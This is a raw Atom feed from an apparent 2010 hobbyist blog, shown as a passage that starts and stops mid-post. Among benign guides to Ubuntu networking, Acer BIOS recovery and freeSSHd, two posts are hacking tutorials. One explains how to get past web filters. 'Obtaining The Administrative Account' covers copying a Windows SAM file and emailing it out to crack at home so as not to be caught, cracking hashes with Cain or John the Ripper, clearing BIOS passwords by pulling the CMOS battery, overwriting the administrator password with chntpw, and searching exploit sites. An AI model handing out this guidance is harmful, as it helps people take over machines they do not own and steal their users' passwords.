/&gt;&lt;br /&gt;Also, programs such as Privoxy will allow you to proxy through your local computer and tunnel that connection to an actual proxy&lt;br /&gt;server so you do not have to go looking for working ones. This program can be found at: http://www.privoxy.org/&lt;br /&gt;&lt;br /&gt;To learn how to use Privoxy, please RTFM (Read The Fine Manual) they have so graciously put together for you. It's a very good&lt;br /&gt;program and I definitely recommend it.&lt;br /&gt;&lt;br /&gt;Using Google To Bypass:&lt;br /&gt;&lt;br /&gt;The reason google is such a good tool to bypass web filters is because the people (usually admins) setting up the filters will&lt;br /&gt;not block google as it's the world's greatest search engine (yes, that is my opinion and I am sticking to it). To use google to&lt;br /&gt;bypass filters for you, just stick the URL on the end of this URL:&lt;br /&gt;&lt;br /&gt;http://translate.google.com/translate?hl=en&amp;amp;sl=fr&amp;amp;u=&lt;br /&gt;&lt;br /&gt;So if I wanted to go to the website: www.blocked.com I would type into my address bar:&lt;br /&gt;&lt;br /&gt;http://translate.google.com/translate?hl=en&amp;amp;sl=fr&amp;amp;u=www.blocked.com&lt;br /&gt;&lt;br /&gt;And google will be very happy to translate the website for you, bypassing the web filter that was originally blocking your access.&lt;br /&gt;&lt;br /&gt;CGIProxy:&lt;br /&gt;&lt;br /&gt;CGIProxy is a cgi script that was written to act as a proxy. The reason this is a good method is because you can host your own&lt;br /&gt;proxy server right from a website. Once you visit the hosted cgi script then you are able to type in a URL and the script will&lt;br /&gt;display it for you.&lt;br /&gt;&lt;br /&gt;A nice easy way of finding hosts running these scripts is using google. So search:&lt;br /&gt;&lt;br /&gt;inurl:“cgiproxy” and enjoy your search results.&lt;br /&gt;&lt;br /&gt;Or you can use www.cgiproxy.co.uk&lt;br /&gt;&lt;br /&gt;HTTP Tunneling:&lt;br /&gt;&lt;br /&gt;Using putty is a great way to tunnel all of your HTTP traffic through SSH sessions. The great thing about doing this is&lt;br /&gt;that all traffic is transferred through the encrypted tunnel, meaning web filters are not able to see what the traffic is&lt;br /&gt;to block it. This is also useful when you are doing any web browsing and don't want people to be able to sniff the traffic.&lt;br /&gt;&lt;br /&gt;To setup putty, just go to the “tunnel” tab on the left within the putty application and select the source port to be anything&lt;br /&gt;you want, the destination to be the proxy server address followed by the proxy port number.&lt;br /&gt;&lt;br /&gt;So it would look like this:&lt;br /&gt;&lt;br /&gt;Source Port: 8080&lt;br /&gt;Destination: proxyip:8080&lt;br /&gt;&lt;br /&gt;Once you do this, establish your connection to your ssh server and setup your proxy connection in the browser of your choice&lt;br /&gt;(as we covered earlier in this tutorial).&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8668264831440713284-5331589243593484895?l=bbtuna1364.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bbtuna1364.blogspot.com/feeds/5331589243593484895/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/bypassing-web-filtering-systems.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/5331589243593484895'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/5331589243593484895'/><link rel='alternate' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/bypassing-web-filtering-systems.html' title='Bypassing Web Filtering Systems'/><author><name>BBTUNA</name><uri>http://www.blogger.com/profile/10330198244468715380</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8668264831440713284.post-4181382111923446889</id><published>2010-02-11T11:24:00.001-08:00</published><updated>2010-02-11T11:24:36.725-08:00</updated><title type='text'>Obtaining The Administrative Account</title><content type='html'>So you want administrative privileges on that windows box do ya? Well, sit back, grab a cup of coffee or your&lt;br /&gt;favorite beverage and continue reading on.&lt;br /&gt;&lt;br /&gt;This tutorial is going to explain the different methods of obtaining administrative privileges, such as cracking&lt;br /&gt;the administrator's password hash, injecting your own password hash into the administrator's account, and exploiting&lt;br /&gt;windows in such a way that you'll have the privileges on the user account you are using at the time.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Cracking The Hash:&lt;br /&gt;&lt;br /&gt;This is my favorite way of obtaining administrator on a windows box, mostly because it allows me to know what the&lt;br /&gt;administrator's password is, which is often times used in more than one place and for more than one purpose.&lt;br /&gt;&lt;br /&gt;The Administrator's hash is stored in the %windir%\system32\config\SAM file. SAM stands for Security Accounts Manager.&lt;br /&gt;This file stores all the hashes for the local user account on the windows machine, so you can crack not only the&lt;br /&gt;administrator's, but any users (which is a good thing when you want to know someone's actual password).&lt;br /&gt;&lt;br /&gt;The safest way to crack the administrator's hash from a SAM file is by grabbing a copy of the SAM file and cracking it&lt;br /&gt;in another location, such as home. This assures that you won't be caught right there cracking it, and if you need to leave&lt;br /&gt;a box running to bruteforce it without the box being tampered with you can do so in the safety of your own home. I prefer&lt;br /&gt;e-mail it to myself, but you can use a USB drive also.&lt;br /&gt;&lt;br /&gt;There are plenty of programs that will dump the accounts and hashes from the SAM file. I use Cain and Abel on my windows box.&lt;br /&gt;The infamous John The Ripper will also dump/crack these hashes for you. You can either spend your time bruteforcing the&lt;br /&gt;hashes, dictionary attacking the hashes, or just checking to see if there is any sites online that has the hashes cracked&lt;br /&gt;already and stored, such as:&lt;br /&gt;&lt;br /&gt;http://securitystats.com/&lt;br /&gt;&lt;br /&gt;If it isn't cracked here and it means that much to you, allow the bruteforcer to run against the hashes for a couple days.&lt;br /&gt;&lt;br /&gt;For wordlists I strongly recommend:&lt;br /&gt;&lt;br /&gt;argon24MB.zip, to find this just type in google:&lt;br /&gt;&lt;br /&gt;intitle:“index of /” “argon24MB.zip”&lt;br /&gt;&lt;br /&gt;There is also a version 2 of The Argon, which is a 2GB wordlist file.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Injecting Your Own Hash:&lt;br /&gt;&lt;br /&gt;This method is very dangerous as it will change the administrator's password and they will realize it as soon as their&lt;br /&gt;password doesn't work that something is going on. With this method you'll either have to be able to boot from a CD, USB&lt;br /&gt;drive, or floppy disk. This might mean changing the BIOS setting, but that shouldn't be a problem. If there is a password&lt;br /&gt;on the BIOS, take the CMOS battery off the motherboard for a good minute and a half or so, put it back on, and the BIOS&lt;br /&gt;password will be gone.&lt;br /&gt;&lt;br /&gt;The program that we will use to inject our own password into the SAM file is called “chntpw” and can be found at:&lt;br /&gt;&lt;br /&gt;http://freshmeat.net/projects/chntpw/&lt;br /&gt;&lt;br /&gt;And two liveboot CDs that I know for a fact have this utility on them are:&lt;br /&gt;&lt;br /&gt;Knoppix-STD (http://www.knoppix-std.org/download.html)&lt;br /&gt;Auditor (http://www.remote-exploit.org/index.php/Auditor_mirrors)&lt;br /&gt;&lt;br /&gt;Just stick either one of these CDs into the machine and you'll be greeted by a nice GUI. From there you can run chntpw&lt;br /&gt;and follow the prompts to set the password of your choice on the local user account of your choice.&lt;br /&gt;&lt;br /&gt;Also, you can use this Emergency BootCD to reset the password of any local user account:&lt;br /&gt;&lt;br /&gt;http://ebcd.pcministry.com/&lt;br /&gt;&lt;br /&gt;Be very careful when using this method.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Exploiting Windows:&lt;br /&gt;&lt;br /&gt;By exploiting windows I just mean finding an exploit to use against windows that will either drop you down to an&lt;br /&gt;administrative (or system) command prompt, or exploiting it so that it creates a new administrative account.&lt;br /&gt;&lt;br /&gt;I did a video tutorial on the jpeg buffer overflow exploit, so if you watch that, it should give you an idea of what&lt;br /&gt;I am talking about.&lt;br /&gt;&lt;br /&gt;Sites you can check for exploits:&lt;br /&gt;&lt;br /&gt;www.milw0rm.com&lt;br /&gt;www.packetstormsecurity.org&lt;br /&gt;www.securiteam.com&lt;br /&gt;&lt;br /&gt;These sites will allow you to search and find exploits that will help you out in your journey to obtaining administrative&lt;br /&gt;privileges. If there isn't an exploit that works right off the bat, sit and wait for one to come out, as they do quite often.&lt;br /&gt;I suggest learning how to compile source code, as that's what these exploits are going to be, the source code you need to&lt;br /&gt;compile in order to run.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8668264831440713284-4181382111923446889?l=bbtuna1364.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bbtuna1364.blogspot.com/feeds/4181382111923446889/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/obtaining-administrative-account.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/4181382111923446889'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/4181382111923446889'/><link rel='alternate' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/obtaining-administrative-account.html' title='Obtaining The Administrative Account'/><author><name>BBTUNA</name><uri>http://www.blogger.com/profile/10330198244468715380</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8668264831440713284.post-7677689364486993448</id><published>2010-02-11T11:18:00.000-08:00</published><updated>2010-02-11T11:21:09.743-08:00</updated><title type='text'>Packet Generator</title><content type='html'>&lt;p&gt;Whenever you make and debug a packet capturing and analyzing program,&lt;/p&gt;&lt;p&gt;you are forced to generate packets again and again using a certain network application.&lt;/p&gt;&lt;p&gt;With this packet generator tool, you don't have to do it. &lt;/p&gt;&lt;p&gt;This tool enables you to generate and send packets easily using given capture file(*.cap) to a specific network adapter.&lt;/p&gt;&lt;p&gt;However, you'd better install and use virtual network adapter( &lt;a href="http://www.gilgil.net/?module=file&amp;amp;act=procFileDownload&amp;amp;file_srl=694&amp;amp;sid=ef3cbb6049f22b4045cb60f35d79257d"&gt;VirtNet.zip&lt;/a&gt; ) to avoid any network traffic load on the real world network.&lt;/p&gt;&lt;p&gt;&lt;span class="Apple-style-span" style="line-height: 16px; font-family: Arial,Helvetica,sans-serif;"&gt;&lt;a href="http://www.brothersoft.com/virtual-network-adapter-virtnet-94667.html" target="_blank"&gt;http://www.brothersoft.com/virtual-network-adapter-virtnet-94667.html&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span class="Apple-style-span"  style="font-family:Arial, Helvetica, sans-serif;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;Based on WinPcap( &lt;a href="http://www.winpcap.org/" target="_blank"&gt;http://www.winpcap.org&lt;/a&gt; ).&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;span class="Apple-style-span"  style="font-family:AppleGothic, Tahoma, sans-serif;"&gt;&lt;span class="Apple-style-span" style="line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;   &lt;/p&gt;&lt;blockquote class="webkit-indent-blockquote" style="border: medium none ; margin: 0pt 0pt 0pt 40px; padding: 0px;"&gt;&lt;span class="Apple-style-span" style="line-height: 19px; font-family: AppleGothic,Tahoma,sans-serif;"&gt;&lt;a href="http://www.gilgil.net/648" target="_self"&gt;&lt;img rel="xe_gallery" src="http://www.gilgil.net/files/attach/images/134/410/download.jpg" alt="download.jpg" title="download.jpg" style="border-width: 0px; margin: 0px; padding: 0px; cursor: pointer;" width="181" height="94" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8668264831440713284-7677689364486993448?l=bbtuna1364.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bbtuna1364.blogspot.com/feeds/7677689364486993448/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/packet-generator.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/7677689364486993448'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/7677689364486993448'/><link rel='alternate' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/packet-generator.html' title='Packet Generator'/><author><name>BBTUNA</name><uri>http://www.blogger.com/profile/10330198244468715380</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8668264831440713284.post-4827227420320281875</id><published>2010-02-11T11:15:00.000-08:00</published><updated>2010-02-11T11:17:33.209-08:00</updated><title type='text'>Acer Aspire One BIOS Recovery</title><content type='html'>The AA1 has a built-in BIOS recovery routine, which makes it possible to flash the BIOS even if the system doesn't boot anymore. It's only meant for emergencies, that's why it's also known as crisis disk mode. Use at your own risk.&lt;br /&gt;&lt;br /&gt;First format an USB flash drive with FAT.&lt;br /&gt;&lt;br /&gt;Download the &lt;a href="http://macles.blogspot.com/2009/04/acer-aspire-one-bios-3310.html"&gt;latest BIOS&lt;/a&gt;, extract all files from the zip file, put both FLASHIT.EXE and the BIOS file with FD suffix in the root directory of the drive. The files must not be in a folder. Rename the BIOS file to &lt;b&gt;ZG5IA32.FD&lt;/b&gt;, that's important.&lt;br /&gt;&lt;br /&gt;Turn the AA1 off, with the USB drive still connected, and make sure both battery and AC adapter are also connected.&lt;br /&gt;&lt;br /&gt;Press Fn+Esc, keep it pressed and press the power button. Release Fn+Esc after a few seconds, the power button will be blinking. Press the power button once. The AA1 will now initiate the BIOS flash, do not interrupt it under any circumstances. After a while the power button will stop blinking, and the AA1 will reboot shortly after. Wait patiently.&lt;br /&gt;&lt;br /&gt;The BIOS has been flashed and all settings reset to default.&lt;br /&gt;&lt;br /&gt;If it doesn't reboot by itself, but the power button still blinks, wait a few minutes before turning it off, and try again.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8668264831440713284-4827227420320281875?l=bbtuna1364.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bbtuna1364.blogspot.com/feeds/4827227420320281875/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/acer-aspire-one-bios-recovery.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/4827227420320281875'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/4827227420320281875'/><link rel='alternate' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/acer-aspire-one-bios-recovery.html' title='Acer Aspire One BIOS Recovery'/><author><name>BBTUNA</name><uri>http://www.blogger.com/profile/10330198244468715380</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8668264831440713284.post-4850358876601470783</id><published>2010-02-11T11:13:00.000-08:00</published><updated>2010-02-11T11:14:24.486-08:00</updated><title type='text'>Howto: Ubuntu Linux convert DHCP network configuration to static IP configuration</title><content type='html'>&lt;p&gt;My friend wanted to know how to change or convert DHCP network configuration to static configuration. After initial installation, he wanted to change network settings. Further, his system is w/o GUI system aka X Windows. Here is quick way to accomplish the same:&lt;/p&gt; &lt;p&gt;Your main network configuration file is &lt;span style="color: rgb(102, 51, 0);"&gt;/etc/network/interfaces&lt;/span&gt;&lt;/p&gt; &lt;p&gt;Desired new sample settings:&lt;br /&gt;=&gt; Host IP address 192.168.1.100&lt;br /&gt;=&gt; Netmask: 255.255.255.0&lt;br /&gt;=&gt; Network ID: 192.168.1.0&lt;br /&gt;=&gt; Broadcast IP: 192.168.1.255&lt;br /&gt;=&gt; Gateway/Router IP: 192.168.1.254&lt;br /&gt;=&gt; DNS Server: 192.168.1.254&lt;/p&gt; &lt;p&gt;Open network configuration file&lt;br /&gt;&lt;code&gt;$ sudo vi /etc/network/interfaces&lt;/code&gt;OR&lt;code&gt;$ sudo nano /etc/network/interfaces&lt;/code&gt;&lt;/p&gt; &lt;p&gt;Find and remove dhcp entry:&lt;br /&gt;&lt;code&gt;iface eth0 inet dhcp&lt;/code&gt;&lt;/p&gt; &lt;p&gt;Append new network settings:&lt;/p&gt; &lt;p&gt;&lt;code&gt;iface eth0 inet static&lt;br /&gt;        address 192.168.1.100&lt;br /&gt;        netmask 255.255.255.0&lt;br /&gt;        network 192.168.1.0&lt;br /&gt;        broadcast 192.168.1.255&lt;br /&gt;        gateway 192.168.1.254&lt;br /&gt;&lt;/code&gt;&lt;br /&gt;Save and close the file. Restart the network:&lt;br /&gt;&lt;code&gt;$ sudo /etc/init.d/networking restart&lt;/code&gt;&lt;/p&gt; &lt;h3&gt;Task: Define new DNS servers &lt;/h3&gt; &lt;p&gt;Open /etc/resolv.conf  file&lt;br /&gt;&lt;code&gt;$ sudo vi /etc/resolv.conf   &lt;/code&gt;&lt;/p&gt; &lt;p&gt;You need to remove old DNS server assigned by DHCP server:&lt;br /&gt;&lt;code&gt;search myisp.com&lt;br /&gt;nameserver 192.168.1.254&lt;br /&gt;nameserver 202.54.1.20&lt;br /&gt;nameserver 202.54.1.30&lt;br /&gt;&lt;/code&gt;&lt;br /&gt;Save and close the file.&lt;/p&gt; &lt;h3&gt;Task: Test DNS server&lt;/h3&gt; &lt;p&gt;&lt;code&gt;$ host cyberciti.biz&lt;/code&gt;&lt;/p&gt; &lt;h3&gt;Network command line cheat sheet&lt;/h3&gt; &lt;p&gt;You can also use commands to change settings. Please note that these settings are temporary and not the permanent. Use above method to make network changes permanent or GUI tool as described below.&lt;/p&gt; &lt;h3&gt;Task: Display network interface information&lt;/h3&gt; &lt;p&gt;&lt;code&gt;$ ifconfig&lt;/code&gt;&lt;/p&gt; &lt;h3&gt;Task: Take down network interface eth0 / take a network interface down&lt;/h3&gt; &lt;p&gt;&lt;code&gt;$ sudo ifconfig eth0 down&lt;/code&gt;OR &lt;code&gt;$ sudo ifdown eth0 &lt;/code&gt;&lt;/p&gt; &lt;h3&gt;Task: Bring a network interface eth0 up &lt;/h3&gt; &lt;p&gt;&lt;code&gt;$ sudo ifconfig eth0 up&lt;/code&gt;OR&lt;code&gt;$ sudo ifup eth0 &lt;/code&gt;&lt;/p&gt; &lt;h3&gt;Task: Change IP address and netmask from command line&lt;/h3&gt; &lt;p&gt;Activate network interface eth0 with a new IP (192.168.1.50) / netmask:&lt;br /&gt;&lt;code&gt;$ sudo ifconfig eth0 192.168.1.50 netmask 255.255.255.0 up&lt;/code&gt;&lt;/p&gt; &lt;h3&gt;Task: Display the routing table &lt;/h3&gt; &lt;p&gt;&lt;code&gt;$ /sbin/route &lt;/code&gt;OR&lt;code&gt;$ /sbin/route -n&lt;/code&gt;&lt;br /&gt;Output:&lt;/p&gt; &lt;pre&gt;Kernel IP routing table&lt;br /&gt;Destination     Gateway         Genmask         Flags Metric Ref    Use Iface&lt;br /&gt;localnet        *               255.255.255.0   U     0      0        0 ra0&lt;br /&gt;172.16.114.0    *               255.255.255.0   U     0      0        0 eth0&lt;br /&gt;172.16.236.0    *               255.255.255.0   U     0      0        0 eth1&lt;br /&gt;default         192.168.1.254   0.0.0.0         UG    0      0        0 ra0&lt;br /&gt;&lt;/pre&gt; &lt;h3&gt;Task: Add a new gateway &lt;/h3&gt; &lt;p&gt;&lt;code&gt;$ sudo route add default gw 172.16.236.0&lt;/code&gt;&lt;/p&gt; &lt;h3&gt;Task: Display current active Internet connections (servers and established connection)&lt;/h3&gt; &lt;p&gt;&lt;code&gt;$ netstat -nat&lt;/code&gt;&lt;/p&gt; &lt;h3&gt;Task: Display open ports&lt;/h3&gt; &lt;p&gt;&lt;code&gt;$ sudo netstat -tulp&lt;/code&gt;OR&lt;code&gt;$ sudo netstat -tulpn&lt;/code&gt;&lt;/p&gt; &lt;h3&gt;Task: Display network interfaces stats (RX/TX etc)&lt;/h3&gt; &lt;p&gt;&lt;code&gt;$ netstat -i&lt;/code&gt;&lt;/p&gt; &lt;h3&gt;Task: Display output for active/established connections only&lt;/h3&gt; &lt;p&gt;&lt;code&gt;$ netstat -e&lt;br /&gt;$ netstat -te&lt;br /&gt;$ netstat -tue&lt;br /&gt;&lt;/code&gt;&lt;/p&gt; &lt;p&gt;Where,&lt;/p&gt; &lt;ul&gt;&lt;li&gt;-t : TCP connections &lt;/li&gt;&lt;li&gt;-u : UDP connections&lt;/li&gt;&lt;li&gt;-e : Established &lt;/li&gt;&lt;/ul&gt; &lt;h3&gt;Task: Test network connectivity&lt;/h3&gt; &lt;p&gt;Send ICMP ECHO_REQUEST to network hosts, routers, servers etc with ping command. This verifies connectivity exists between local host and remote network system:&lt;br /&gt;&lt;code&gt;$ ping router&lt;br /&gt;$ ping 192.168.1.254&lt;br /&gt;$ ping cyberciti.biz&lt;/code&gt;&lt;/p&gt; &lt;p&gt;See &lt;a href="http://www.cyberciti.biz/tips/simple-linux-and-unix-system-monitoring-with-ping-command-and-scripts.html"&gt;simple Linux system monitoring with ping command and scripts&lt;/a&gt; for more information.&lt;/p&gt; &lt;h3&gt;Task: Use GUI (Graphical Configuration) network Tool&lt;/h3&gt; &lt;p&gt;If you are new, use GUI configuration tool, type the following command at terminal:&lt;br /&gt;&lt;code&gt;$ network-admin &amp;amp;&lt;/code&gt;&lt;/p&gt; &lt;p&gt;Above command is Ubuntu's GUI for configuring network connections tool.&lt;/p&gt; &lt;h3&gt;Final tip - Learn how find out more information about commands&lt;/h3&gt; &lt;p&gt;A man page is your best friend when you wanted to learn more about particular command or syntax. For example, read detailed information about ifconfig and netstat command:&lt;br /&gt;&lt;code&gt;$ man ifconfig&lt;br /&gt;$ man netstat&lt;br /&gt;&lt;/code&gt;&lt;br /&gt;Just get a short help with all command options by appending --help option to each command:&lt;br /&gt;&lt;code&gt;$ netstat --help&lt;/code&gt;&lt;/p&gt; &lt;p&gt;Find out what command is used for particular task by searching the short descriptions and manual page names for the keyword:&lt;br /&gt;&lt;code&gt;$ man -k 'delete directory'&lt;br /&gt;$ apropos -s 1 remove&lt;/code&gt;&lt;/p&gt; &lt;p&gt;Display short descriptions of a command:&lt;br /&gt;&lt;code&gt;$ whatis rm&lt;br /&gt;$ whatis netstat&lt;/code&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8668264831440713284-4850358876601470783?l=bbtuna1364.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bbtuna1364.blogspot.com/feeds/4850358876601470783/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/howto-ubuntu-linux-convert-dhcp-network.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/4850358876601470783'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/4850358876601470783'/><link rel='alternate' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/howto-ubuntu-linux-convert-dhcp-network.html' title='Howto: Ubuntu Linux convert DHCP network configuration to static IP configuration'/><author><name>BBTUNA</name><uri>http://www.blogger.com/profile/10330198244468715380</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8668264831440713284.post-6225402349134889383</id><published>2010-02-05T22:55:00.001-08:00</published><updated>2010-02-05T22:55:42.316-08:00</updated><title type='text'>How to Setup SSH Server in Windows with freeSSHd</title><content type='html'>&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, Verdana, sans-serif; font-size: 13px; color: rgb(102, 102, 102); "&gt;&lt;p&gt;Have you ever wanted to &lt;strong&gt;control your Windows remotely using the command line&lt;/strong&gt;? With the SSH network protocol, you can! Telnet is another way to achieve this, but it is not as secure as SSH. In this simple guide, I will tell you on how to &lt;strong&gt;setup a SSH server in Windows with freeSSHd&lt;/strong&gt;.&lt;/p&gt;&lt;p&gt;With this setup, you can now access and manage your PC from another computer using the Windows command line. That means that you can &lt;strong&gt;copy, edit, move and delete files inside your home computer from another computer in the office&lt;/strong&gt;, for example. Furthermore, the SSH network protocol secures the connection between the two connected computers! If you are interested, you can &lt;a title="read more on ssh here" href="http://en.wikipedia.org/wiki/Secure_Shell" target="_blank" style="text-decoration: none; color: rgb(0, 102, 153); border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-width: initial; border-color: initial; "&gt;read more on SSH&lt;/a&gt; .&lt;/p&gt;&lt;p&gt;&lt;img src="http://www.techmalaya.com/blog/wp-content/uploads/2009/08/setup-ssh-sshd-server-windows.jpg" alt="setup-ssh-sshd-server-windows" width="300" height="247" /&gt;&lt;/p&gt;&lt;p&gt;&lt;span id="more-1616"&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt; &lt;/p&gt;&lt;h3 style="font-family: Verdana, Arial, Helvetica, sans-serif; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 16px; font-weight: bold; "&gt;Step 1: Setup SSH Server in Windows with freeSSHd&lt;/h3&gt;&lt;p&gt;This is an &lt;span style="text-decoration: underline; "&gt;absolute noob guide&lt;/span&gt; , so I’ll explain in detail. If you are an advanced user (boo!), you are welcome to skip the installation steps.&lt;/p&gt;&lt;p&gt;1- freeSSHd is the easiest software to use to get SSH working in Windows. &lt;a title="link to download freesshd" href="http://www.freesshd.com/freeSSHd.exe" target="_blank" style="text-decoration: none; color: rgb(0, 102, 153); border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-width: initial; border-color: initial; "&gt;Download freeSSHd&lt;/a&gt; before proceeding any further.&lt;/p&gt;&lt;p&gt;2- Double click the freeSSHd installer that you have downloaded to get started.&lt;/p&gt;&lt;p&gt;&lt;img src="http://www.techmalaya.com/blog/wp-content/uploads/2009/08/freesshd-windows-ssh-server-1.gif" alt="freesshd-windows-ssh-server" width="219" height="66" /&gt;&lt;/p&gt;&lt;p&gt;3- Click Next -&gt; Click Next (or you can change the default installation directory) -&gt; Click Next (Full Installation) -&gt; Click Next (Start Menu Folder) -&gt; Click Next (Create a desktop icon) -&gt; Click Install (ready to install) -&gt; Wait until installation has been finished -&gt; Click Close (Try other products…)&lt;/p&gt;&lt;p&gt;&lt;img src="http://www.techmalaya.com/blog/wp-content/uploads/2009/08/setup-freesshd-first-screen.gif" alt="setup-freesshd-first-screen" width="300" height="231" /&gt;&lt;/p&gt;&lt;p&gt;4- “&lt;em&gt;Do you want to run freeSSHd as a system service?&lt;/em&gt;” I choose “No” so I can start freeSSHd manually. This is a good security practice because you don’t want to have running applications in the background if you are not using it. Only turn freeSSHd on when the need for remote connections arise!&lt;/p&gt;&lt;p&gt;&lt;img src="http://www.techmalaya.com/blog/wp-content/uploads/2009/08/start-ssh-as-system-service-option.gif" alt="start-ssh-as-system-service-option" width="300" height="126" /&gt;&lt;/p&gt;&lt;p&gt;5- Click Finish to complete freeSSHd installation.&lt;/p&gt;&lt;p&gt; &lt;/p&gt;&lt;h3 style="font-family: Verdana, Arial, Helvetica, sans-serif; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 16px; font-weight: bold; "&gt;Step 2: Run freeSSHd&lt;/h3&gt;&lt;p&gt;6- Double click the freeSSHd icon on the desktop to load your SSH server. You can see the freeSSHd icon on your system tray.&lt;/p&gt;&lt;p&gt;7- Right click on the icon and click Settings.&lt;/p&gt;&lt;p&gt;&lt;img src="http://www.techmalaya.com/blog/wp-content/uploads/2009/08/go-to-freesshd-settings.gif" alt="go-to-freesshd-settings" width="142" height="94" /&gt;&lt;/p&gt;&lt;p&gt;8- Make sure that the freeSSHd settings page (Server Settings tab) shows that your&lt;em&gt;&lt;strong&gt;“SSH server is running”&lt;/strong&gt;&lt;/em&gt;.&lt;/p&gt;&lt;p&gt;&lt;img src="http://www.techmalaya.com/blog/wp-content/uploads/2009/08/check-running-freesshd-server.gif" alt="check-running-freesshd-server" width="300" height="282" /&gt;&lt;/p&gt;&lt;p&gt; &lt;/p&gt;&lt;h3 style="font-family: Verdana, Arial, Helvetica, sans-serif; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 16px; font-weight: bold; "&gt;Step 3: Create a New SSH User&lt;/h3&gt;&lt;p&gt;9- Click on the Users tab. You need to create at least one user account that will act as your SSH remote user account.&lt;/p&gt;&lt;p&gt;&lt;img src="http://www.techmalaya.com/blog/wp-content/uploads/2009/08/add-ssh-users.gif" alt="add-ssh-users" width="300" height="330" /&gt;&lt;/p&gt;&lt;p&gt;10- Click “Add” to create a new user. Fill in the user details, following the example shown below (with your own unique username and password, duh!). Click OK and make sure it appear on the Users tab 